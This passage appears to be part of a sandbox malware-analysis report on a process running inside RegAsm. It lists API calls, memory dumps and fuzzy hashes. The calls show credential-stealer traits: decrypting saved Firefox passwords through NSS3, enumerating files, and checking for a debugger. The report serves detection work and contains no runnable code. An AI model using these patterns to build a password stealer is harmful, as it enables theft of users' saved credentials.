                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Find$FileHeaplstrcatlstrlenwsprintf$AllocCloseFirstNextProcess
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                                                                  • API String ID: 1803110163-2848263008
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c642167a6290580b630f387f52ebb509a17423caf3bec4ba48deea40bc4f230
                                                                                                                                                                                                                                                                                                  • Instruction ID: dbd6ffb95f0b046b2f2b534e4af8bb74dadcf752387ee3bb10109dd6a12b6fb9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c642167a6290580b630f387f52ebb509a17423caf3bec4ba48deea40bc4f230
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C51C4B1900318ABDB10EFA4DC49FEE7779AF49704F00469DFA15A3290DB789B44CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C81EE7A
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C81EFB5
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C821695
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8216B4
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C821770
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C821A3E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$freemallocmemcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3693777188-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpystrlen
                                                                                                                                                                                                                                                                                                  • String ID: (pre-xul)$data$name$schema
                                                                                                                                                                                                                                                                                                  • API String ID: 3412268980-999448898
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D4F2
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D50B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FCFE0: EnterCriticalSection.KERNEL32(6C87E784), ref: 6C7FCFF6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FCFE0: LeaveCriticalSection.KERNEL32(6C87E784), ref: 6C7FD026
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D52E
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87E7DC), ref: 6C81D690
                                                                                                                                                                                                                                                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C81D6A6
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E7DC), ref: 6C81D712
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C82D1C5), ref: 6C81D751
                                                                                                                                                                                                                                                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C81D7EA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                                                                  • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409259
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(004095B3,00000001,?,00001FA0,00000000,00000000,?,004095B3), ref: 00409276
                                                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(004095B3,00000000,?,004095B3), ref: 0040927E
                                                                                                                                                                                                                                                                                                  • PK11_GetInternalKeySlot.NSS3(?,004095B3), ref: 0040928C
                                                                                                                                                                                                                                                                                                  • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,004095B3), ref: 004092A1
                                                                                                                                                                                                                                                                                                  • PK11SDR_Decrypt.NSS3(00000000,?,00000000), ref: 004092D5
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004092F1
                                                                                                                                                                                                                                                                                                  • PK11_FreeSlot.NSS3 ref: 0040930B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00426A96,00426A9A), ref: 0040932D
                                                                                                                                                                                                                                                                                                  • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00420838), ref: 00409334
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00426A96,00426A9B), ref: 0040934F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: K11_$Slot$Freelstrcat$AuthenticateBinaryCryptDecryptInternalStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2752138542-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 6C854EFF
                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C854F2E
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE ref: 6C854F52
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000), ref: 6C854F62
                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8552B2
                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8552E6
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000010), ref: 6C855481
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C855498
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                                                                  • API String ID: 4104871533-3887548279
                                                                                                                                                                                                                                                                                                  • Opcode ID: eca3cfe4577ca55d6b02fff610a59a01f85312d1089f320acac4890cb07d6f49
                                                                                                                                                                                                                                                                                                  • Instruction ID: 22c15bac81896ddec6aef261d37e618d605a762aed88346645fdd05d30a34221
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eca3cfe4577ca55d6b02fff610a59a01f85312d1089f320acac4890cb07d6f49
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CF1D271A18B108FC727CF39C85062BB7F5AFD6288F458B2EF846A7651EB719441CB81
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00426AB3,?,?,00000010), ref: 0040A9F3
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CC8), ref: 0040AA6C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426CCC), ref: 0040AA86
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$FileFindFirstlstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: #$\*.*
                                                                                                                                                                                                                                                                                                  • API String ID: 1618123633-1611066409
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0a8ec05f244c86406a8fe8979b7f854254d8865f4acec3e6b9b417325801ff64
                                                                                                                                                                                                                                                                                                  • Instruction ID: ced4800e6e760bbc3ca27c8dc2d2998dd4273cc07fb5b6c4be82cfcfc02e7abf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a8ec05f244c86406a8fe8979b7f854254d8865f4acec3e6b9b417325801ff64
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D125371801149EACB15EBA1C951BDEBB78AF15304F5040BEE606735D2DF782B4CCBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C842C31
                                                                                                                                                                                                                                                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C842C61
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C7F4E5A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C7F4E97
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C842C82
                                                                                                                                                                                                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C842E2D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8081B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C8081DE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                                                                                                                                  • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                                                                                                  • API String ID: 801438305-4149320968
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1b12a875881d29122a30a4d504fd22471b861fdbe19aa639b45068ac0d54df03
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4e019622f5848ad628e4ae33f09385c69f9f69666b810df909d70b2f7fe2f871
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b12a875881d29122a30a4d504fd22471b861fdbe19aa639b45068ac0d54df03
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8091C0706087488FD734CF28C58469EB7E0AFC9358F508D2EE59A87751EB34D949CB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                                                                  • String ID: -Infinity$NaN
                                                                                                                                                                                                                                                                                                  • API String ID: 3839614884-2141177498
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f689a73b4c1322d0e45649c8d974d4b867c440feb69863c694c38d36285c505
                                                                                                                                                                                                                                                                                                  • Instruction ID: 31e8774cd27793394bd403c00a0f01cc519e94be9315ec705b762e91892c4469
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f689a73b4c1322d0e45649c8d974d4b867c440feb69863c694c38d36285c505
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6C1B671E00319CBDB24CF98C9947EEB7B6BF84704F94492DD406ABB40D7B1A949CBA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0041E96A
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041E97F
                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(8d), ref: 0041E98A
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041E9A6
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041E9AD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                  • String ID: 8d
                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-1695097073
                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa8ae53db3ad8f3f305726abe46a993882e983b0c4a78402654160bf020c60c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1ab6a00abfa9653b80813f5f871d9f09f7cc8be42b21d6e5291d250c042eb096
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa8ae53db3ad8f3f305726abe46a993882e983b0c4a78402654160bf020c60c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD21E5BC910324DFE751DF15EC896847BB2FB0A319F50202AEA0887761E7765A81CF5D
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C868A4B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                                  • Instruction ID: 372a2a26612863b877cc438f36c279791e04c7df18dd699f2443012171478dae
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAB1E772A0021ACFDB24CF69CDD07A9B7B2EF85314F1806B9C549DBB85D730A985CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8688F0
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C86925C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8a4d86911fb2bd189793dcc3b4238fad058b9ae4a6c9cd823577ded9d0b253c3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9B1C672E0120ACFCB24CF59C9816A9B7B2EF85314F150679C949DBB85D730A999CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C847A81
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C847A93
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815C50: GetTickCount64.KERNEL32 ref: 6C815D40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815C50: EnterCriticalSection.KERNEL32(6C87F688), ref: 6C815D67
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C847AA1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815C50: __aulldiv.LIBCMT ref: 6C815DB4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815C50: LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C815DED
                                                                                                                                                                                                                                                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C847B31
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
